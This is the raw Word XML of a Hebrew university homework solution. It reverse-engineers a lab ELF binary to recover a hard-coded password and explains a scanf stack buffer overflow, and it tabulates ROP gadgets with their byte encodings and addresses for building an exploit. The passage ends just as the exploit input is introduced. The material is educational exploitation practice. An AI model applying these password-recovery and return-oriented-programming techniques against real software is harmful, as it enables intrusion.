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C1CA2" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:bidi/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_s5dxeym2rlha" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>ארגון ותכנות המחשב – תרגיל בית 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E358AF" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:bidi/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_g4aafpmf8eer" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>שאלה 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCDDF48" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>מוגדרים ב-</w:t>
      </w:r>
      <w:r>
        <w:t>prog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> תשעה </w:t>
      </w:r>
      <w:r>
        <w:t>program headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB9F5A" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ישנם שני </w:t>
      </w:r>
      <w:r>
        <w:t>headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מסוג </w:t>
      </w:r>
      <w:r>
        <w:t>LOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>, במקומות 02 ו-03 ב-</w:t>
      </w:r>
      <w:r>
        <w:t>program headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D237F" w14:textId="286D1B59" w:rsidR="00F40F5B" w:rsidRDefault="00313914">
      <w:pPr>
        <w:bidi/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>02:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7BD3E" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Offset: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E53C1E6" w14:textId="2589CAA8" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory location: </w:t>
      </w:r>
      <w:r w:rsidR="00313914">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00313914">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>400000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E426E3E" w14:textId="04F82B2F" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File size: </w:t>
      </w:r>
      <w:r w:rsidR="007702F8">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>1864</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C2A9F" w14:textId="1403916C" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory size: </w:t>
      </w:r>
      <w:r w:rsidR="007702F8">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>1864</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4BF765" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Flags: Read, Execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765EAB2A" w14:textId="085452D1" w:rsidR="00F40F5B" w:rsidRDefault="00313914">
      <w:pPr>
        <w:bidi/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>03:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9636B" w14:textId="4A3C6C7D" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Offset: </w:t>
      </w:r>
      <w:r w:rsidR="00313914">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>1e10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7CEC5" w14:textId="68E4C014" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory location: </w:t>
      </w:r>
      <w:r w:rsidR="00313914">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>601e10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A543FAC" w14:textId="47B297C7" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File size: </w:t>
      </w:r>
      <w:r w:rsidR="007702F8">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>22c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B76BB" w14:textId="1DF047F7" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory size: </w:t>
      </w:r>
      <w:r w:rsidR="007702F8">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A6EE8E" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Flags: Read, Write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A7290" w14:textId="43AC1A20" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>בתחילת ריצת התוכנית תוכן הזיכרון ב-401234</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>0 הוא חלק מ-</w:t>
      </w:r>
      <w:r>
        <w:t>section</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> 02. משום שה-</w:t>
      </w:r>
      <w:r>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שלו הוא 0, מדובר בבית שבמקום ה-1234 מתחילת התוכנית. מ-</w:t>
      </w:r>
      <w:r>
        <w:t>hexdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נסיק שזהו "</w:t>
      </w:r>
      <w:r w:rsidR="00313914">
        <w:t>c7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9C1E6" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>מאותם השיקולים כמו בסעיף 3, נקבל כי</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34806840" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Char foo[26] = {0x63,0x66,0x6d,0x61,0x79,0x67,0x74,0x75,0x72,0x73,0x78,0x6c,0x70,0x6f,0x64,0x71,0x65,0x7a,0x6e,0x77,0x69,0x6b,0x68,0x6a,0x62,0x76}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C34F8" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>מאותם השיקולים כמו בסעיף 3, נקבל כי</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F8E023" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Char bar[11]={0x0f,0x07,0x14,0x12,0x06,0x14,0x0b,0x0b,0x14,0x0d,0x12}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB9AF2" w14:textId="6688A78E" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>נתבונן ב-</w:t>
      </w:r>
      <w:r>
        <w:t>symtable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ונראה כי </w:t>
      </w:r>
      <w:r>
        <w:t>check_password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מופיע במקום </w:t>
      </w:r>
      <w:r w:rsidR="00313914">
        <w:t>0x4005f0</w:t>
      </w:r>
      <w:r w:rsidR="00313914">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ב</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>זיכרון. מאותם השיקולים כמו בסעיף 3, נתבונן ב-</w:t>
      </w:r>
      <w:r>
        <w:t>disassembly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של הקובץ החל משורה </w:t>
      </w:r>
      <w:r w:rsidR="00313914">
        <w:t>0x5f0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>, ונשלים את הפונקציה בהתאם:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013415E7" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>int check_password(char* s){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4638E62E" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>int i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE35373" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for (i=0;i&lt;11;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F050E76" w14:textId="0A8B4363" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if (s[i]</w:t>
      </w:r>
      <w:r w:rsidR="00313914">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>!=</w:t>
      </w:r>
      <w:r w:rsidR="00313914">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>foo[bar[i]]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20089ABD" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0524FE49" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773BDDC7" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB82263" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return s[11]==0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090C1CFD" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C0D467" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">מעקב אחרי האינדקסים המתאימים לפונקציה בזיכרון יחשוף את הסיסמה הנכספת: </w:t>
      </w:r>
      <w:r>
        <w:t>quintillion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A139A0" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="742C9087" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:bidi/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_oa0v9npmkewy" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>שאלה 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB19057" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>קריאה ל-</w:t>
      </w:r>
      <w:r>
        <w:t>scanf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ללא הגבלה על מס' התווים אותו נוכל להכניס, מאפשרת לנו להכניס לזיכרון מידע שרירותי שיאפשר למשתמש לשנות את התנהגות התוכנית, בטעות או בזדון.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB38D6" w14:textId="264B5FB1" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">אחרי הכנסת הקלט הלא תקין, פקודת </w:t>
      </w:r>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> תקפוץ</w:t>
      </w:r>
      <w:r w:rsidR="001B6BDB">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לכתובת</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B6BDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="001B6BDB" w:rsidRPr="001B6BDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3435363738396162</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>. זאת משום ש-</w:t>
      </w:r>
      <w:r>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מעבירה ל-</w:t>
      </w:r>
      <w:r>
        <w:t>scanf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD094A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">בתור באפר </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">את הכתובת הנוכחית של </w:t>
      </w:r>
      <w:r>
        <w:t>rsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D865EC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">שבו </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>מ</w:t>
      </w:r>
      <w:r w:rsidR="00D865EC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ו</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>קצ</w:t>
      </w:r>
      <w:r w:rsidR="00D865EC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ים</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD094A">
        <w:t>0x18</w:t>
      </w:r>
      <w:r w:rsidR="00BD094A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>בתים (כלומר 24) של משתנים לוקאליים. אורך הסיסמה שהכנסנו היא 36 תווים (=בתים), ולכן בתים 25-32 ידרסו את כתובת החזרה מהפונקציה, כלומר ייכתבו הבתים</w:t>
      </w:r>
      <w:r w:rsidR="00D865EC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D865EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ba987654</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>, שכאשר קוראים אותם ב-</w:t>
      </w:r>
      <w:r>
        <w:t>little endian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מקבלים את הכתו</w:t>
      </w:r>
      <w:r w:rsidR="00D865EC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ב</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>ת הנ"ל. (מלבד זאת נדרוס עוד 4 בתים במעלה המחסנית)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC064DA" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00F40F5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi/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F40F5B" w14:paraId="19DE4675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9C375" w14:textId="4EC0FEDB" w:rsidR="00F40F5B" w:rsidRDefault="005B1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rPr>
                <w:rFonts w:hint="cs"/>
                <w:rtl/>
              </w:rPr>
              <w:t>פקודות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C252F" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6C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rPr>
                <w:rtl/>
              </w:rPr>
              <w:t>קידוד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B796E" w14:textId="27692112" w:rsidR="00F40F5B" w:rsidRDefault="005B1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rPr>
                <w:rFonts w:hint="cs"/>
                <w:rtl/>
              </w:rPr>
              <w:t>מיקום</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B19DB" w14:paraId="7A87021B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9CDB8" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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pop %rdi </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F41B3A4" w14:textId="5585F9D6" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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5A32D" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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5f c3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9EF88" w14:textId="5079F1B7" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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0x401663</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B19DB" w14:paraId="57F6127C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65ADC" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B19DB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>pop %rax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2868AD83" w14:textId="17A8B691" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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53D0D" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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58 c3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9FF5B" w14:textId="7C5BD955" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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0x4015fe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B19DB" w14:paraId="54634C6C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00361" w14:textId="7E6749B7" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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syscall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E5C08" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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0f 05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D76CD" w14:textId="1ECD0CC2" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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0x400e9d</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B19DB" w14:paraId="21BD845B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20A5A" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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push %rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C240E56" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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 $8, %al</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00779CB0" w14:textId="6E46EBF4" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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call* %rdi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2AA10" w14:textId="1740ED4B" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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54 24 08 </w:t>
            </w:r>
            <w:r w:rsidR="00FC4406">
              <w:t>ff</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> d7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7BAFE" w14:textId="350B560F" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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0x4008ed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B19DB" w14:paraId="12A573B3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31D37" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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pop %rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FC48613" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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pop %rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01583822" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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pop %rbp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E8B67FA" w14:textId="306E30CB" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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0E89E" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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5e 5f 5d c3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39845" w14:textId="5A13760C" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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0x4007a6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B19DB" w14:paraId="77076012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3CCEB" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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dec %rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70544B54" w14:textId="0858FDF9" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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AC348" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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48 ff cf c3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0512F" w14:textId="3F72F30D" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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0x400833</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B19DB" w14:paraId="2CE92CDD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81E35" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B19DB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>pop %rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174BC5DA" w14:textId="77777777" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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pop %r15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70FD973C" w14:textId="50F1F391" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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FCD03" w14:textId="7D994C9E" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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5e 41 5</w:t>
            </w:r>
            <w:r w:rsidR="002708FB">
              <w:t>f</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> c3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8C20C" w14:textId="1C10BCE5" w:rsidR="005B19DB" w:rsidRDefault="005B19DB" w:rsidP="005B1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0x401661</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="086AE059" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00F40F5B">
      <w:pPr>
        <w:bidi/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072D6371" w14:textId="77777777" w:rsidR="00F40F5B" w:rsidRDefault="00EC6CF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rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נשתמש בקלט הבא על מנת לגרום לתוכנית לצאת עם ערך 17. בעזרת החולשה ב</w:t>
      </w:r>
      <w:r>
